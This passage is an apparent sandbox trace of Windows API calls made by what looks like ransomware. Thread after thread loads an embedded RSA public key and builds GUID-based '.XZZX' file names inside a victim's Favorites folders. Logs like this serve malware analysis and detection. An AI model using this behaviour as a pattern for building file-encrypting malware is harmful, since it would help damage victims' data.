LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.626] lstrcpyW (in: lpString1=0x2baf460, lpString2="30FEF3B4011ABE0E503ED66C0532A256.XZZX" | out: lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX") returned="30FEF3B4011ABE0E503ED66C0532A256.XZZX" [0237.626] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0237.626] SetErrorMode (uMode=0x1) returned 0x1 [0237.626] lstrcpyW (in: lpString1=0x2baf860, lpString2="30FEF3B4011ABE0E503ED66C0532A256.XZZX" | out: lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX") returned="30FEF3B4011ABE0E503ED66C0532A256.XZZX" [0237.626] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xc7c08ce, Data2=0xf387, Data3=0x4a1d, Data4=([0]=0xbd, [1]=0x3d, [2]=0x1, [3]=0x2b, [4]=0xb7, [5]=0xbf, [6]=0x2b, [7]=0xe))) returned 0x0 [0237.626] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\30FEF3B4011ABE0E503ED66C0532A256.XZZX") returned 100 [0237.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0237.626] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\51C42EA246809C4B0C7C08CE493B8093.XZZX") returned 100 [0237.626] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 932 os_tid = 0x1198 [0237.782] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.782] lstrcpyW (in: lpString1=0x2baf460, lpString2="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" | out: lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX") returned="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" [0237.782] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0237.782] SetErrorMode (uMode=0x1) returned 0x1 [0237.782] lstrcpyW (in: lpString1=0x2baf860, lpString2="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" | out: lpString1="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX") returned="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX" [0237.782] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x9e03d58, Data2=0xd480, Data3=0x48cf, Data4=([0]=0xaf, [1]=0x8d, [2]=0x44, [3]=0x2d, [4]=0x0, [5]=0x75, [6]=0xda, [7]=0x9d))) returned 0x0 [0237.782] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\B2A8C78F28F146042377D2FD2D1E2A4C.XZZX") returned 100 [0237.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0237.782] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\A2EB8C003C6FD38009E03D583F2AB7C8.XZZX") returned 100 [0237.782] StrStrW (lpFirst="B2A8C78F28F146042377D2FD2D1E2A4C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 933 os_tid = 0x119c [0237.937] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0237.937] lstrcpyW (in: lpString1=0x2baf460, lpString2="FD9030E848C62D90344A51E94CDE11D8.XZZX" | out: lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX") returned="FD9030E848C62D90344A51E94CDE11D8.XZZX" [0237.937] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0237.937] SetErrorMode (uMode=0x1) returned 0x1 [0237.937] lstrcpyW (in: lpString1=0x2baf860, lpString2="FD9030E848C62D90344A51E94CDE11D8.XZZX" | out: lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX") returned="FD9030E848C62D90344A51E94CDE11D8.XZZX" [0237.937] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x352e6582, Data2=0x76be, Data3=0x47cb, Data4=([0]=0xad, [1]=0xa5, [2]=0xf7, [3]=0x39, [4]=0x16, [5]=0x30, [6]=0x4a, [7]=0x76))) returned 0x0 [0237.938] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\FD9030E848C62D90344A51E94CDE11D8.XZZX") returned 100 [0237.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0237.938] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\DB39427C214CDAAA352E65822407BEF2.XZZX") returned 100 [0237.938] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 934 os_tid = 0x11a0 [0238.096] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0238.096] lstrcpyW (in: lpString1=0x2baf460, lpString2="13771DB6235C0ADD78BD03922773EF25.XZZX" | out: lpString1="13771DB6235C0ADD78BD03922773EF25.XZZX") returned="13771DB6235C0ADD78BD03922773EF25.XZZX" [0238.096] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.096] SetErrorMode (uMode=0x1) returned 0x1 [0238.096] lstrcpyW (in: lpString1=0x2baf860, lpString2="13771DB6235C0ADD78BD03922773EF25.XZZX" | out: lpString1="13771DB6235C0ADD78BD03922773EF25.XZZX") returned="13771DB6235C0ADD78BD03922773EF25.XZZX" [0238.096] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xd8964ce7, Data2=0x1d4d, Data3=0x4d70, Data4=([0]=0xb1, [1]=0xb5, [2]=0x8c, [3]=0xcb, [4]=0xba, [5]=0xcc, [6]=0xc3, [7]=0x92))) returned 0x0 [0238.096] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\13771DB6235C0ADD78BD03922773EF25.XZZX") returned 94 [0238.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0238.096] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\2BEB4C7B08DCFAB0D8964CE70B97DEF8.XZZX") returned 94 [0238.096] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 935 os_tid = 0x11a4 [0238.249] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0238.249] lstrcpyW (in: lpString1=0x2baf460, lpString2="583CA788134302604AF8FA2E175AE6A8.XZZX" | out: lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX") returned="583CA788134302604AF8FA2E175AE6A8.XZZX" [0238.249] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.249] SetErrorMode (uMode=0x1) returned 0x1 [0238.249] lstrcpyW (in: lpString1=0x2baf860, lpString2="583CA788134302604AF8FA2E175AE6A8.XZZX" | out: lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX") returned="583CA788134302604AF8FA2E175AE6A8.XZZX" [0238.249] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x20a16491, Data2=0x29ef, Data3=0x4b04, Data4=([0]=0xb2, [1]=0x4a, [2]=0xda, [3]=0xdf, [4]=0x89, [5]=0x47, [6]=0x9c, [7]=0x14))) returned 0x0 [0238.249] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\583CA788134302604AF8FA2E175AE6A8.XZZX") returned 94 [0238.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0238.250] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\4FC81C5F0C49ACBC20A164910F049104.XZZX") returned 94 [0238.250] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 936 os_tid = 0x11a8 [0238.405] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0238.405] lstrcpyW (in: lpString1=0x2baf460, lpString2="833DF956476C97EAEAF8AD0B4B847C32.XZZX" | out: lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX") returned="833DF956476C97EAEAF8AD0B4B847C32.XZZX" [0238.405] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.405] SetErrorMode (uMode=0x1) returned 0x1 [0238.406] lstrcpyW (in: lpString1=0x2baf860, lpString2="833DF956476C97EAEAF8AD0B4B847C32.XZZX" | out: lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX") returned="833DF956476C97EAEAF8AD0B4B847C32.XZZX" [0238.406] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x140ac352, Data2=0x8384, Data3=0x479d, Data4=([0]=0x98, [1]=0x13, [2]=0x70, [3]=0x78, [4]=0x18, [5]=0x75, [6]=0xee, [7]=0x43))) returned 0x0 [0238.406] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\833DF956476C97EAEAF8AD0B4B847C32.XZZX") returned 94 [0238.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0238.406] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\D77FAC4824CA43F4140AC3522785283C.XZZX") returned 94 [0238.406] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 937 os_tid = 0x11ac [0238.562] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0238.562] lstrcpyW (in: lpString1=0x2baf460, lpString2="880F5E93248AC126C0E08BB728B7A56E.XZZX" | out: lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX") returned="880F5E93248AC126C0E08BB728B7A56E.XZZX" [0238.562] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.562] SetErrorMode (uMode=0x1) returned 0x1 [0238.562] lstrcpyW (in: lpString1=0x2baf860, lpString2="880F5E93248AC126C0E08BB728B7A56E.XZZX" | out: lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX") returned="880F5E93248AC126C0E08BB728B7A56E.XZZX" [0238.562] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xa2ef267a, Data2=0xf80, Data3=0x4b24, Data4=([0]=0xa4, [1]=0x93, [2]=0x4b, [3]=0x17, [4]=0xfa, [5]=0x97, [6]=0xec, [7]=0x3))) returned 0x0 [0238.562] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\880F5E93248AC126C0E08BB728B7A56E.XZZX") returned 94 [0238.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0238.562] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\7AD46300048CAE00A2EF267A07479248.XZZX") returned 94 [0238.562] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 938 os_tid = 0x11b0 [0238.718] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0238.718] lstrcpyW (in: lpString1=0x2baf460, lpString2="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" | out: lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX") returned="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" [0238.718] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0238.718] SetErrorMode (uMode=0x1) returned 0x1 [0238.718] lstrcpyW (in: lpString1=0x2baf860, lpString2="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" | out: lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX") returned="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" [0238.718] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x15004915, Data2=0xb18a, Data3=0x427a, Data4=([0]=0xb3, [1]=0xe, [2]=0x85, [3]=0xb8, [4]=0x2d, [5]=0x32, [6]=0xf3, [7]=0x25))) returned 0x0 [0238.718] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\8F3B67D5108CB69FDD5C15D914B99AE7.XZZX") returned 94 [0238.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0238.718] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\84AEEA522E1A2FC41500491530D5140C.XZZX") returned 94 [0238.718] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 939 os_tid = 0x11b4 [0238.874] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN 